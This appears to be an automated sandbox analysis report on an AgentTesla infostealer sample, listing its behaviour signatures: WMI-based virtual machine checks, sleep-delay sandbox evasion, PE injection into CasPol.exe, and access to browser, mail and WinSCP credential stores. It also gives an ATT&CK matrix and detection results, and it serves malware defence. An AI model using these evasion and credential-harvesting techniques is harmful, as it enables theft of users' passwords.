        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\Desktop\e-dekont-20230207.exe TID: 6092Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2280Thread sleep count: 9641 > 30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -21213755684765971s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1200000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1199750s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1199563s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1199390s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1199281s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1199155s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198980s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198859s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198750s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198637s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198515s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198404s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198293s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198186s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1198078s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197963s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197843s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197734s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197625s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197516s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197405s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197280s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197162s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1197000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196891s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196779s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196638s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196531s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196422s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196309s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196203s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1196093s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195984s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195875s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195765s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195656s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195547s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195432s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195312s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195203s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1195078s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194953s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194843s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194734s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194625s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194499s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194391s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194279s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194172s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1194062s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2904Thread sleep time: -1193931s >= -30000s
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1200000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199750
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199563
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199390
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199281
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199155
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198980
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198859
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198750
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198637
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198515
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198404
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198293
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198186
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198078
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197963
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197843
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197734
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197625
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197516
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197405
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197280
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197162
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196891
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196779
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196638
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196531
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196422
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196309
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196203
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196093
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195984
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195875
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195765
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195656
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195547
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195432
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195312
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195203
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195078
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194953
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194843
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194734
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194625
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194499
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194391
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194279
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194062
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1193931
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9641
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1200000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199750
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199563
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199390
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199281
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199155
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198980
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198859
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198750
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198637
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198515
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198404
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198293
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198186
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198078
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197963
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197843
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197734
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197625
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197516
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197405
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197280
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197162
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196891
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196779
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196638
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196531
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196422
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196309
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196203
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196093
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195984
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195875
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195765
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195656
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195547
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195432
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195312
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195203
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195078
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194953
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194843
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194734
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194625
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194499
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194391
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194279
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194062
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1193931
        Source: CasPol.exe, 00000001.00000003.312026803.0000000005BA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42C000
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42E000
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 754008
        Allocates memory in foreign processes
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeQueries volume information: C:\Users\user\Desktop\e-dekont-20230207.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        barindex
        Yara detected AgentTesla
        Source: Yara matchFile source: 00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6100, type: MEMORYSTR
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6100, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected AgentTesla
        Source: Yara matchFile source: 00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6100, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts211
        Windows Management Instrumentation        		Path Interception311
        Process Injection        		1
        Disable or Modify Tools        		1
        OS Credential Dumping        		114
        System Information Discovery        		Remote Services11
        Archive Collected Data        		Exfiltration Over Other Network Medium3
        Ingress Tool Transfer        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Deobfuscate/Decode Files or Information        		11
        Input Capture        		111
        Security Software Discovery        		Remote Desktop Protocol1
        Data from Local System        		Exfiltration Over Bluetooth11
        Encrypted Channel        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
        Obfuscated Files or Information        		1
        Credentials in Registry        		131
        Virtualization/Sandbox Evasion        		SMB/Windows Admin Shares1
        Email Collection        		Automated Exfiltration4
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)22
        Software Packing        		NTDS1
        Application Window Discovery        		Distributed Component Object Model11
        Input Capture        		Scheduled Transfer15
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Timestomp        		LSA Secrets1
        Remote System Discovery        		SSH1
        Clipboard Data        		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        Masquerading        		Cached Domain Credentials1
        System Network Configuration Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items131
        Virtualization/Sandbox Evasion        		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job311
        Process Injection        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        e-dekont-20230207.exe26%ReversingLabsByteCode-MSIL.Trojan.GenSteal
        e-dekont-20230207.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        1.2.CasPol.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File

        Domains

        No Antivirus matches

        URLs

